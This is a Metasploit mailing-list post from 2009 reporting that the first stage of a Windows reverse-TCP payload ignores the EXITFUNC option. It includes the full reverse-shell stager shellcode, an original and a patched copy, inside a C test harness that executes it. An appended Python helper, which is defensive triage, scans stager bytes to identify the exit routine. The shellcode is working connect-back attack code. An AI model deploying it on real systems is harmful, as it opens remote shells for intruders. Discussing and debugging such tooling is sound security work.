Metasploit mailing list archives
Shellcodes first stage ignores EXITFUNC
From: Amin <amin () zitune ch>
Date: Thu, 31 Dec 2009 13:57:03 +0100
Hi Everybody,

First of all: thank ALL of you for metasploit and for keeping it improving! It's a joy to work with :-) !

Now my problem: the first stage of multistage windows shellcodes does not consider the EXITFUNC option. This has an impact on connect-back shellcodes, where the ReverseConnectRetries option is set to a number less than 255 (finite number of retries). After failing to connect to the attacker, the stage exits.

By looking at this first stage of the shellcode we always find an ExitProcess call instead of the one specified with EXITFUNC.
Regards,
Amin

A short example:

------------- example.cpp -------------
#include <stdio.h>
#include <windows.h>

/*
 * windows/shell/reverse_tcp - 290 bytes (stage 1)
 * http://www.metasploit.com
 * EXITFUNC=thread, LPORT=4444, ReverseConnectRetries=5,
 * LHOST=127.0.0.1
 */
unsigned char buf[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a"
"\x05\x68\x7f\x00\x00\x01\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10"
"\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e"
"\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56"
"\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10"
"\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a"
"\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6"
"\x85\xf6\x75\xec\xc3";

/*
 * modified:
 * Replace ExitProcess (0x56A2B5F0) with ExitThread (0x0A2A1DE0)
 */
unsigned char buf_modified[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a"
"\x05\x68\x7f\x00\x00\x01\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10"
"\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e"
"\x08\x75\xec\x68"
"\xe0\x1d\x2a\x0a" // ExitThread
"\xff\xd5\x6a\x00\x6a\x04\x56"
"\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10"
"\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a"
"\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6"
"\x85\xf6\x75\xec\xc3";

int main(int argc, char *argv[])
{
    void (*payfun)();
    HANDLE hThread;

    // Modified shellcode: ExitThread only ends the worker thread,
    // so the wait returns and the message below is printed.
    payfun = *(void (__cdecl *)(void))&buf_modified;
    hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)payfun, NULL, 0, NULL);
    WaitForSingleObject(hThread, INFINITE);
    printf("-[[ Modified shellcode exited\n");
    fflush(stdout);

    // Original shellcode: ExitProcess terminates the whole process
    // once the connect retries are exhausted, so the second message
    // is never printed.
    payfun = *(void (__cdecl *)(void))&buf;
    hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)payfun, NULL, 0, NULL);
    WaitForSingleObject(hThread, INFINITE);
    printf("-[[ Original shellcode exited\n");
    fflush(stdout);
    return 0;
}
----------------- EoF -----------------

Output:

$ example.exe
-[[ Modified shellcode exited
$

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
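An added triage helper, not part of Amin's post: it scans a stager for the `push imm32; call ebp` (68 xx xx xx xx ff d5) sequences the Metasploit API-resolver stub uses and reports which exit routine the stage will actually call, so the EXITFUNC mismatch described above can be confirmed on a captured blob without running it. The ExitProcess (0x56A2B5F0) and ExitThread (0x0A2A1DE0) hashes are the ones named in the post; the other hash names are assumptions based on Metasploit's standard API hashing, and the sample bytes are short fragments of the stager printed above.

```python
import struct

# Hash -> API name. ExitProcess/ExitThread come from the post; the rest are
# assumed from Metasploit's block_api hashing convention for this stager.
API_HASHES = {
    0x56A2B5F0: "kernel32!ExitProcess",
    0x0A2A1DE0: "kernel32!ExitThread",
    0x0726774C: "kernel32!LoadLibraryA",
    0xE553A458: "kernel32!VirtualAlloc",
    0x006B8029: "ws2_32!WSAStartup",
    0xE0DF0FEA: "ws2_32!WSASocketA",
    0x6174A599: "ws2_32!connect",
    0x5FC8D902: "ws2_32!recv",
}
EXIT_HASHES = (0x56A2B5F0, 0x0A2A1DE0)


def find_api_calls(blob: bytes):
    """Return [(offset, hash, name)] for every 'push imm32; call ebp'
    (68 xx xx xx xx ff d5) sequence found in the stager bytes."""
    calls = []
    for i in range(len(blob) - 6):
        if blob[i] == 0x68 and blob[i + 5:i + 7] == b"\xff\xd5":
            h = struct.unpack_from("<I", blob, i + 1)[0]
            calls.append((i, h, API_HASHES.get(h, "unknown")))
    return calls


def exit_function(blob: bytes):
    """Name of the exit routine the stager resolves, or None if neither
    ExitProcess nor ExitThread is pushed before a call ebp."""
    for _, h, name in find_api_calls(blob):
        if h in EXIT_HASHES:
            return name
    return None


# Constructed fragment (tail of the stager above, not the full 290 bytes):
# connect, the "dec dword [esi+8]; jnz" retry loop, then the exit call.
SAMPLE_EXITPROCESS = (
    b"\x68\x99\xa5\x74\x61\xff\xd5"           # push connect; call ebp
    b"\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec"   # test eax; jz; dec [esi+8]; jnz
    b"\x68\xf0\xb5\xa2\x56\xff\xd5"           # push ExitProcess; call ebp
)
# Same fragment with the hash Amin swapped in (EXITFUNC=thread).
SAMPLE_EXITTHREAD = SAMPLE_EXITPROCESS.replace(
    b"\xf0\xb5\xa2\x56", b"\xe0\x1d\x2a\x0a")

if __name__ == "__main__":
    for name, blob in (("original", SAMPLE_EXITPROCESS),
                       ("modified", SAMPLE_EXITTHREAD)):
        print(name, "exits via", exit_function(blob))
```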
Current thread:
- Shellcodes first stage ignores EXITFUNC Amin (Dec 31)
- Re: Shellcodes first stage ignores EXITFUNC HD Moore (Dec 31)
- Re: Shellcodes first stage ignores EXITFUNC Amin (Dec 31)
- Re: Shellcodes first stage ignores EXITFUNC HD Moore (Dec 31)